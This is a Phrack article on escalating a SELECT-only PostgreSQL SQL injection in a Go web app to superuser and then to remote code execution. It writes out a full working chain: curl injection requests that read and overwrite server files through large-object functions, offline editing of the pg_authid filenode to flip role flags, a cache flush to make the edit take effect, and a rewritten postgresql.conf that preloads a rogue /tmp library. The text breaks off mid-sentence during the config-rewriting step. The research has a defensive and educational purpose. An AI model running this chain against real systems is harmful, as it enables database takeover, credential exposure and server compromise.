                           ==Phrack Inc.==

             Volume 0x10, Issue 0x47, Phile #0x08 of 0x11

|=-----------------------------------------------------------------------=|
|=-----------=[ World of SELECT-only PostgreSQL Injections: ]=-----------=|
|=--------------------=[ (Ab)using the filesystem ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Maksym Vatsyk ]=---------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

0 - Introduction
1 - The SQLi that started it all
    1.0 - Target info
    1.1 - A rather trivial injection
    1.2 - No stacked queries for you
    1.3 - Abusing server-side lo_ functions
    1.4 - Not (entirely) a superuser
    1.5 - Looking for a privesc
2 - PostgreSQL storage concepts
    2.0 - Tables and Filenodes
    2.1 - Filenode format
    2.2 - Table metadata
    2.3 - Cold and Hot Data storages
    2.4 - Editing filenodes offline
3 - Updating the PostgreSQL data without UPDATE
    3.0 - Identifying target table
    3.1 - Search for the associated Filenode
    3.2 - Reading and downloading Filenode
    3.3 - Extracting table metadata
    3.4 - Making ourselves a superuser
    3.5 - Flushing Hot storage
4 - SELECT-only RCE
    4.0 - Reading original postgresql.conf
    4.1 - Choosing a parameter to exploit
    4.2 - Compiling malicious library
    4.3 - Uploading the stuff back to the server
    4.4 - Reload successful
5 - Conclusions
6 - References
7 - Source code

--[ 0 - Introduction

This article tells the story of how a failed attempt to exploit a basic
SQL injection in a web API with the PostgreSQL DBMS quickly spiraled
into 3 months of researching database source code and (hopefully)
helping to create several new techniques to pwn Postgres hosts in
restrictive contexts.

Let's get into the story, shall we?

--[ 1 - The SQLi that started it all

---[ 1.0 - Target info

The target web app was written with the Golang Gin[0] framework and
used PGX[1] as a DB driver.
What is interesting about the application is that it is a trusted
public data repository: anyone can query all of the data, but updates
are limited to a trusted set of users. This means that a SELECT SQL
injection will have no impact on the application, while DELETE and
UPDATE ones would still be critical.

Unfortunately, I am not allowed to disclose the source code of the
original application, but it can be roughly boiled down to this example
(with data and tables changed to something artificial):
package main

import (
	"context"
	"fmt"
	"log"
	"net/http"

	"github.com/gin-gonic/gin"
	"github.com/jackc/pgx/v4/pgxpool"
)

var pool *pgxpool.Pool

type Phrase struct {
	ID   int    `json:"id"`
	Text string `json:"text"`
}

func phraseHandler(c *gin.Context) {
	phrases := []Phrase{}
	phrase_id := c.DefaultQuery("id", "1")

	query := fmt.Sprintf(
		"SELECT id, text FROM phrases WHERE id=%s",
		phrase_id,
	)

	rows, err := pool.Query(context.Background(), query)
	defer rows.Close()
	if err != nil {
		c.JSON(
			http.StatusInternalServerError,
			gin.H{"error": err.Error()},
		)
		return
	}

	for rows.Next() {
		var phrase Phrase
		err := rows.Scan(&phrase.ID, &phrase.Text)
		if err != nil {
			c.JSON(
				http.StatusInternalServerError,
				gin.H{"error": err.Error()},
			)
			return
		}
		phrases = append(phrases, phrase)
	}

	c.JSON(http.StatusOK, phrases)
}

func main() {
	var err error
	pool, err = pgxpool.Connect(
		context.Background(),
		"postgres://localhost/postgres?user=poc_user&password=poc_pass")
	if err != nil {
		log.Fatal(err)
	}
	defer pool.Close()

	r := gin.Default()
	r.GET("/phrases", phraseHandler)
	r.Run(":8000")
}
---[ 1.1 - A rather trivial injection

The actual injection happens inside the phraseHandler function, on
these lines of code. The app directly formats the query parameter "id"
into the query string and calls the pool.Query() function. It couldn't
be any simpler, right?
    phrase_id := c.DefaultQuery("id", "1")

    query := fmt.Sprintf(
        "SELECT id, text FROM phrases WHERE id=%s",
        phrase_id,
    )

    rows, err := pool.Query(context.Background(), query)
    defer rows.Close()
The SQL injection can be quickly confirmed with these cURL requests:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=1"
[
{"id":1,"text":"Hello, world!"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1"
[]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1 OR 1=1"
[
{"id":1,"text":"Hello, world!"},
{"id":2,"text":"A day in paradise."},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
At this moment, our SQL query will look something like:
SELECT id, text FROM phrases WHERE id=-1 OR 1=1
Luckily for us, PostgreSQL and its drivers normally support stacked
queries, opening a wide range of attack vectors for us. We should be
able to append additional queries, separated by semicolons, like so:
SELECT id, text FROM phrases WHERE id=-1; SELECT pg_sleep(5);
Let's just try it... Oh no, what is that?
$ curl -G "http://172.23.16.127:8000/phrases" \
--data-urlencode "id=-1; SELECT pg_sleep(5)"
{
"error":"ERROR: cannot insert multiple commands into a prepared
statement (SQLSTATE 42601)"
}
---[ 1.2 - No stacked queries for you

It turns out that the PGX developers decided to **secure** driver use
by converting any SQL query into a prepared statement under the hood.
This is done to disable any stacked queries whatsoever[2]. It works
because the PostgreSQL database itself does not allow multiple queries
inside a single prepared statement[3].

So, we are suddenly constrained to a single SELECT query! The DBMS will
reject any stacked queries, and nested UPDATE or DELETE queries are
also prohibited by the SQL syntax.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (UPDATE * phrases SET text='lol')"
{
"error":"ERROR: syntax error at or near \"SET\" (SQLSTATE 42601)"
}
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (DELETE * FROM phrases)"
{
"error":"ERROR: syntax error at or near \"FROM\" (SQLSTATE 42601)"
}
Nested SELECT queries are still possible, though!
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (SELECT 1)=1"
[
{"id":1,"text":"Hello, world!"},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
Since one can read the DB data without the SQLi, is this bug even worth
reporting?

---[ 1.3 - Abusing server-side lo_ functions

Not all hope is lost, though! Since nested SELECT queries are allowed,
we can try to call some of the built-in PostgreSQL functions and see if
there are any that can help us.

PostgreSQL has several functions that allow reading files from, and
writing files to, the server running the DBMS. These functions[4] are a
part of the PostgreSQL Large Objects functionality and should be
accessible to superusers by default:

1. lo_import(path_to_file, lo_id) - read a file into a DB large object
2. lo_export(lo_id, path_to_file) - dump a large object into a file

What files can be read? Since the DBMS is normally running under the
postgres user, we can search for readable files via the following
command:
$ cat /etc/passwd | grep postgres
postgres:x:129:129::/var/lib/postgresql:/bin/bash
$ find / -uid 129 -type f -perm -600 2>/dev/null
...
/var/lib/postgresql/data/postgresql.conf <---- main service config
/var/lib/postgresql/data/pg_hba.conf <---- authentication config
/var/lib/postgresql/data/pg_ident.conf <---- psql username mapping
...
/var/lib/postgresql/13/main/base/1/2654 <---- some data files
/var/lib/postgresql/13/main/base/1/2613
There already is an RCE technique, initially discovered by Denis
Andzakovic[5] and sylsTyping[6] in 2021 and 2022, which takes advantage
of the postgresql.conf file. It involves overwriting the config file
and either waiting for the server to reboot or forcefully reloading the
configuration via the pg_reload_conf() PostgreSQL function[7].

We will return to this matter later in the article. For now, let's just
check if we have the permissions to call every function mentioned
above.

Calling the lo_ functions:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)) AS text)"
[
{"id":1337,"text":"31337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_get(31337)) AS text)"
[
{"id":1337,"text":"\\x23202d2d2d...72650a"}
]
Large object functions work just fine! We've imported a file into the
DB and then read it back from the large object with ID 31337.

Calling the pg_reload_conf() function:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[]
There is a problem with the pg_reload_conf() function, however: on
success, it should return a row with the text "true". Why can we call
large object functions but not pg_reload_conf()? Shouldn't they both be
accessible to a superuser?

---[ 1.4 - Not (entirely) a superuser

They should, but we happen to not be one. Our test user has explicit
permissions over the large object functions but lacks access to
anything else. The permissions are similar to the below example
configuration:
CREATE USER poc_user WITH PASSWORD 'poc_pass';
GRANT pg_read_server_files TO poc_user;
GRANT pg_write_server_files TO poc_user;
GRANT USAGE ON SCHEMA public TO poc_user;
GRANT SELECT, INSERT, UPDATE, DELETE ON TABLE pg_largeobject TO poc_user;
GRANT EXECUTE ON FUNCTION lo_export(oid, text) TO poc_user;
GRANT EXECUTE ON FUNCTION lo_import(text, oid) TO poc_user;
---[ 1.5 - Looking for a privesc

If we want to perform RCE through the configuration file reliably, we
must find a way to become a superuser and call pg_reload_conf().

Unlike the popular topic of PostgreSQL RCE techniques, there is not a
whole lot of information about privilege escalation from within the DB.
Luckily for us, the official documentation page for the Large Object
functions gives us some clues for the next steps[4]:

> It is possible to GRANT use of the server-side lo_import and
> lo_export functions to non-superusers, but careful consideration of
> the security implications is required. A malicious user of such
> privileges could easily parlay them into becoming superuser (for
> example by rewriting server configuration files)

What if we were to modify the PostgreSQL table data directly, on disk,
without any UPDATE queries at all?

--[ 2 - PostgreSQL storage concepts

---[ 2.0 - Tables and Filenodes

PostgreSQL has extremely complex data flows to optimize resource usage
and eliminate possible data access conflicts, e.g. race conditions. You
can read about them in great detail in the official
documentation[8][9].

The physical data layout significantly differs from the widely known
"table" and "row" objects. All data is stored on disk in a Filenode
object named with the OID of the respective pg_class object. In other
words, each table has its own Filenode. We can look up the OID and the
respective Filenode name of a given table with the following queries:
SELECT oid FROM pg_class WHERE relname='TABLE_NAME';
-- OR
SELECT pg_relation_filepath('TABLE_NAME');
All of the Filenodes are stored in the PostgreSQL data directory, the
path to which can be queried from the pg_settings table by superusers:
SELECT setting FROM pg_settings WHERE name = 'data_directory';
However, this value should generally be the same across different
installations of the DBMS and can be easily guessed by a third party. A
common path for PostgreSQL data directories on Debian-based systems is
"/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/". We can obtain the
major version by running a "SELECT version()" query through the SQLi.
The default value of CLUSTER_NAME is "main". An example path to the
Filenode of our "phrases" table would be:
=== in psql ===
postgres=# SELECT pg_relation_filepath('phrases');
pg_relation_filepath
----------------------
base/13485/65549
(1 row)
postgres=# SELECT version();
version
-------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
(1 row)
=== in bash ===
$ ll /var/lib/postgresql/13/main/base/13485/65549
-rw------- 1 postgres postgres 8192 mar 14 13:45 /var/lib/postgresql/13/main/base/13485/65549
So: all of the files with numeric names that we found earlier are in
fact separate table Filenodes, which the postgres user can read and
write!

---[ 2.1 - Filenode format

A Filenode is a binary file composed of separate chunks of 0x2000 bytes
called Pages. Each Page holds the actual row data within nested Item
objects. A single Page is laid out as follows (the Filenode is simply
these Pages concatenated):

+-------------+-----------+-----------+-----+-----------+
| Page header | Item ID 1 | Item ID 2 | ... | Item ID n |
+-------------+-----------+-----------+-----+-----------+
|                                                       |
|         ... empty space padded with 0x00 ...          |
|                                                       |
+--------+----------------------------+--------+--------+
| Item n |            ...             | Item 2 | Item 1 |
+--------+----------------------------+--------+--------+

Each Item ID is a pointer into the Page: the Item ID array grows
forward from the Page header, while the Items it points to grow
backwards from the end of the Page, with the free space in between
padded with 0x00.

---[ 2.2 - Table metadata

It is worth noting that the Item objects are stored in a binary format
and cannot be manipulated directly. One must first deserialize them
using metadata from the internal PostgreSQL "pg_attribute" table. We
can query the Item metadata using the following SQL query:
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = 'TABLE_NAME';
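To make the structures above concrete, here is a minimal Python sketch
(an illustration of the concepts, not the full editor) of the two
building blocks of a Filenode parser: reading a Page header with its
Item ID array, and splitting the aggregated metadata string returned by
the query above into per-column descriptors. Field offsets follow the
documented PostgreSQL page layout:

```python
import struct

PAGE_SIZE = 0x2000  # each Page is 8 KiB

def parse_page_header(page: bytes) -> dict:
    """Parse the 24-byte PageHeaderData struct at the start of a Page."""
    (pd_lsn, pd_checksum, pd_flags, pd_lower, pd_upper,
     pd_special, pd_pagesize_version, pd_prune_xid) = struct.unpack_from(
        "<QHHHHHHI", page, 0)
    # pd_lower marks the end of the Item ID array,
    # pd_upper the start of the Item data area
    return {"lower": pd_lower, "upper": pd_upper}

def parse_item_ids(page: bytes) -> list:
    """Item IDs are 4-byte entries right after the header; each packs
    lp_off (15 bits), lp_flags (2 bits) and lp_len (15 bits)."""
    items = []
    for off in range(24, parse_page_header(page)["lower"], 4):
        (word,) = struct.unpack_from("<I", page, off)
        items.append({"lp_off": word & 0x7FFF,
                      "lp_flags": (word >> 15) & 0x3,
                      "lp_len": (word >> 17) & 0x7FFF})
    return items

def parse_metadata(agg: str) -> list:
    """Split the 'attname,typname,attlen,attalign;...' string returned
    by the pg_attribute query into column descriptors."""
    cols = []
    for entry in agg.split(";"):
        name, typname, attlen, attalign = entry.split(",")
        # attlen of -1 marks a variable-length (varlena) field
        cols.append({"name": name, "type": typname,
                     "len": int(attlen), "align": attalign})
    return cols
```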
---[ 2.3 - Cold and Hot data storages

All of the above objects make up the DBMS' cold storage. To access the
data in cold storage through a query, Postgres must first load it into
the RAM cache, a.k.a. hot storage. The following diagram shows a rough
and simplified flow of how PostgreSQL accesses the data:

+------------------+     +--------+     +--------+     +--------+
|Table in RAM cache|---->|Filenode|--+->| Page 1 |--+->| Item 1 |
+------------------+     +--------+  |  +--------+  |  +--------+
                                     |  +--------+  |  +--------+
                                     +->| Page 2 |  +->| Item 2 |
                                     |  +--------+  |  +--------+
                                     |     ...      |     ...
                                     |  +--------+  |  +--------+
                                     +->| Page n |  +->| Item n |
                                        +--------+     +--------+

The DBMS periodically flushes any changes to the data in hot storage to
the filesystem. These syncs may pose a challenge to us! Since we can
only edit the cold storage of a running database, we risk subsequent
hot storage syncs overwriting our edits. Thus, we must ensure that the
table we want to overwrite has been offloaded from the cache. The size
of the cache is controlled by the "shared_buffers" parameter in
postgresql.conf:
# -----------------------------
# PostgreSQL configuration file
# -----------------------------
...
# - Memory -
shared_buffers = 128MB # min 128kB
# (change requires restart)
...
The default cache size is 128MB. So, if we stress the DB with expensive
queries to other tables/large objects before the flush, we might
overflow the cache and clear our target table from it.

---[ 2.4 - Editing filenodes offline

I've created a tool to parse and modify data stored in Filenodes, which
functions independently of the Postgres server that created them. We
can use it to overwrite target table rows with our desired values. The
editor supports both datatype-assisted and raw parsing modes. The
assisted mode is the preferred option, as it allows you to edit the
data safely, without accidentally messing up the whole Filenode
structure.

The actual parsing implementation is way too lengthy to discuss in this
article, but you can find the sources on GitHub[10] (or attached to
this article in section 7) if you want to dig deeper into it. You can
also check out this article[12] on parsing Filenodes in Golang.

--[ 3 - Updating the PostgreSQL data without UPDATE

---[ 3.0 - Identifying target table

So, we are looking to escalate our permissions to those of a DBMS
superuser. Which table should we aim to modify?

All Postgres permissions are stored in the internal table "pg_authid".
All CREATE/DROP/ALTER statements for roles and users actually modify
this table under the hood. Let's inspect it in a psql session under the
default super-admin user:
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid;
-[ RECORD 1 ]--+------------------------------------
oid | 3373
rolname | pg_monitor
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | f
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword |
rolvaliduntil |
... TRUNCATED ...
-[ RECORD 9 ]--+------------------------------------
oid | 10
rolname | postgres
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword |
rolvaliduntil |
-[ RECORD 10 ]-+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
The table contains a bunch of "rol" boolean flags and other interesting
stuff, like the MD5 hashes of the user logon passwords. The default
super-admin user "postgres" has all boolean flags set to true. To
become a superuser, we must flip all boolean fields to true for our
user, "poc_user".

---[ 3.1 - Search for the associated Filenode

To modify the table, we must first locate and read its Filenode from
the disk. As discussed previously, we won't be able to get the data
directory setting from the DBMS, as we lack permissions to read the
"pg_settings" table:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT setting FROM pg_settings WHERE name='data_directory')"
{
"error":"can't scan into dest[1]: cannot scan null into *string"
}
However, we can reliably guess the data directory path by querying the version of the DBMS:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT version())"
[
{"id":1337,"text":"PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit"}
]
The version information gives us more than enough knowledge about the
DBMS and the underlying server. We can simply install the same major
version of PostgreSQL (13) on our own Ubuntu 22.04 VM and find that the
data directory is "/var/lib/postgresql/13/main":
ubuntu@ubuntu-virtual-machine:~$ uname -a
Linux ubuntu-virtual-machine 6.5.0-14-generic #14~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Nov 20 18:15:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
ubuntu@ubuntu-virtual-machine:~$ sudo su postgres
postgres@ubuntu-virtual-machine:~$ pwd
/var/lib/postgresql
postgres@ubuntu-virtual-machine:~$ ls -l 13/main/
total 84
drwx------ 5 postgres postgres 4096 lis 26 14:48 base
drwx------ 2 postgres postgres 4096 mar 15 11:56 global
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_commit_ts
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_dynshmem
drwx------ 4 postgres postgres 4096 mar 15 11:55 pg_logical
drwx------ 4 postgres postgres 4096 lis 26 14:48 pg_multixact
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_notify
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_replslot
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_serial
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_snapshots
drwx------ 2 postgres postgres 4096 mar 11 00:45 pg_stat
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_stat_tmp
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_subtrans
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_tblspc
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_twophase
-rw------- 1 postgres postgres 3 lis 26 14:48 PG_VERSION
drwx------ 3 postgres postgres 4096 lut 4 00:22 pg_wal
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_xact
-rw------- 1 postgres postgres 88 lis 26 14:48 postgresql.auto.conf
-rw------- 1 postgres postgres 130 mar 15 11:55 postmaster.opts
-rw------- 1 postgres postgres 100 mar 15 11:55 postmaster.pid
With the data directory path obtained, we can query the relative path to the "pg_authid" Filenode. Thankfully, there are no permission issues this time.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT pg_relation_filepath('pg_authid'))"
[
{"id":1337,"text":"global/1260"}
]
With all the information in our hands, we can assume that the
"pg_authid" Filenode is located at
"/var/lib/postgresql/13/main/global/1260". Let's download it to our
local machine from the target server.

---[ 3.2 - Reading and downloading the Filenode

We can now quickly download the file as a base64 string through the
Large Object functions "lo_import" and "lo_get" in the following steps:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_import('/var/lib/postgresql/13/main/global/1260', 331337)) AS text)"
[
{"id":1337,"text":"331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > pg_authid_filenode
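The jq + base64 pipeline above can equally be done in a couple of lines
of Python (a sketch, assuming the JSON response shape shown throughout
this article):

```python
import base64
import json

def decode_lo_response(body: str) -> bytes:
    """Extract and decode the base64 'text' field of the SQLi response."""
    rows = json.loads(body)
    return base64.b64decode(rows[0]["text"])

# hypothetical response body, for illustration
print(decode_lo_response('[{"id":1337,"text":"aGVsbG8="}]'))  # b'hello'
```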
After decoding the Base64 into a file, we can confirm that we indeed successfully downloaded the "pg_authid" Filenode by comparing the hashes.
=== on the attacker server ===
$ md5sum pg_authid_filenode
4c9514c6fb515907b75b8ac04b00f923 pg_authid_filenode
=== on the target server ===
postgres@ubuntu-virtual-machine:~$ md5sum /var/lib/postgresql/13/main/global/1260
4c9514c6fb515907b75b8ac04b00f923 /var/lib/postgresql/13/main/global/1260
---[ 3.3 - Extracting table metadata

One last step before parsing the downloaded Filenode -- we must get its
metadata from the server via the following SQLi query:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,STRING_AGG(CONCAT_WS(',',attname,typname,attlen,attalign),';') FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = 'pg_authid'"
[
{"id":1337,"text":"tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"}
]
We should now be able to use our in-house Python3 Filenode editor to
list the data and confirm it is intact. The output for the "rolname"
field will be a bit ugly, because this field is stored as a 64-byte
fixed-length string padded with null bytes, instead of the more common
varchar type:
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m list \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"
[+] Page 0:
--------- item no. 0 ---------
oid : 10
rolname : b'postgres\x00...'
rolsuper : 1
rolinherit : 1
rolcreaterole : 1
rolcreatedb : 1
rolcanlogin : 1
rolreplication: 1
rolbypassrls : 1
rolconnlimit : -1
rolpassword : None
--------- item no. 1 ---------
oid : 3373
rolname : b'pg_monitor\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 0
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : None
... TRUNCATED ...
--------- item no. 9 ---------
oid : 16386
rolname : b'poc_user\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 1
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : b'md58616944eb80b569f7be225c2442582cd'
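As an aside, the md5-style "rolpassword" value shown above follows
PostgreSQL's legacy md5 authentication format: the literal prefix "md5"
followed by md5(password || username). A quick Python sketch to
recompute such a hash, e.g. to sanity-check credentials we control:

```python
import hashlib

def pg_md5_hash(password: str, username: str) -> str:
    """PostgreSQL md5 auth format: 'md5' + md5(password || username)."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()

# for poc_user/poc_pass this should reproduce the hash listed above
h = pg_md5_hash("poc_pass", "poc_user")
```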
---[ 3.4 - Making ourselves a superuser

We can now use the Filenode editor to update Item no. 9, which contains
the entry for "poc_user". For convenience, we can pass any
non-printable fields (such as the "rolname" field) as base64 strings.
We will flip all "rol" flags to 1 with the following editor command:
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m update \
-p 0 \
-i 9 \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d" \
--csv-data "16386,cG9jX3VzZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==,1,1,1,1,1,1,1,-1,md58616944eb80b569f7be225c2442582cd,NULL"
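The long base64 value passed for "rolname" above is nothing special: it
is just the 64-byte, null-padded fixed-length string "poc_user",
encoded for transport. Assuming Python, it can be produced like this:

```python
import base64

def encode_rolname(name: str) -> str:
    """'name' columns are fixed 64-byte strings padded with null bytes,
    so pad before base64-encoding."""
    return base64.b64encode(name.encode().ljust(64, b"\x00")).decode()

payload = encode_rolname("poc_user")
```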
The script will save the updated Filenode to a file with ".new" as an extension. We can now re-upload the data to the PostgreSQL server and overwrite the original data through the SQLi.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331337, decode('$(base64 -w 0 pg_authid_filenode.new)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331337, '/var/lib/postgresql/13/main/global/1260')) AS text)"
[{"id":1337,"text":"1"}]
So, we've just overwritten the Filenode on the disk! But the RAM cache still has the old data. We must find a way to flush it somehow:
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user';
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
---[ 3.5 - Flushing Hot storage

So, you may be wondering - how can we force the server to clean the RAM
cache? How about creating a Large Object with a size matching the
entire cache pool? :DDDDD
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33331337, (SELECT REPEAT('a', 128*1024*1024))::bytea)) AS text)"
[
{"id":1337,"text":"33331337"}
]
The server took at least 5 seconds to process our query, which may indicate our success. Let's check our permissions again:
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user';
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
Success! All "rol" flags were flipped to true! Can we reload the config now?
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
Notice that this query now returns a row with "text" set to "true",
confirming that we are indeed able to reload the config. That's more
like it! We can now perform the SELECT-only RCE.

--[ 4 - SELECT-only RCE

---[ 4.0 - Reading original postgresql.conf

The first step in performing the RCE is to download the original config
file. Since we are a super-admin now, we can query its path directly
from the "pg_file_settings" view without any extra path guessing
effort:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, sourcefile FROM pg_file_settings"
[
{"id":1337,"text":"/etc/postgresql/13/main/postgresql.conf"}
]
Let's download it with the help of previously used Large Object functions:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/etc/postgresql/13/main/postgresql.conf', 3333331337)) AS text)"
[
{"id":1337,"text":"3333331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(3333331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > postgresql.conf
---[ 4.1 - Choosing a parameter to exploit

There are several known options that can already be used for an RCE:

- ssl_passphrase_command (by Denis Andzakovic[5])
- archive_command (by sylsTyping[6])

But are any other parameters worth looking into?
$ cat postgresql.conf
...
# - Shared Library Preloading -
#local_preload_libraries = ''
#session_preload_libraries = ''
#shared_preload_libraries = '' # (change requires restart)
...
# - Other Defaults -
#dynamic_library_path = '$libdir'
These parameters specify libraries to be loaded dynamically by the DBMS
from the path in the "dynamic_library_path" variable, under specific
conditions. That sounds promising!

We will focus on the "session_preload_libraries" variable, which
dictates what libraries should be preloaded by the server on a new
connection[11]. It does not require a restart of the server, unlike
"shared_preload_libraries", and does not have a specific prefix
prepended to the path, unlike "local_preload_libraries".

So, we can rewrite the malicious postgresql.conf to have a writable
directory in "dynamic_library_path", e.g. /tmp, and a rogue library
filename in "session_preload_libraries", e.g. "payload.so". The updated
config file will look like this:
$ cat postgresql.conf
...
# - Shared Library Preloading -
session_preload_libraries = 'payload.so'
...
# - Other Defaults -
dynamic_library_path = '/tmp:$libdir'
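Producing the malicious config from the downloaded original can be
scripted. The sketch below is my own helper (the parameter values are
the ones used in this article); it simply rewrites the two lines,
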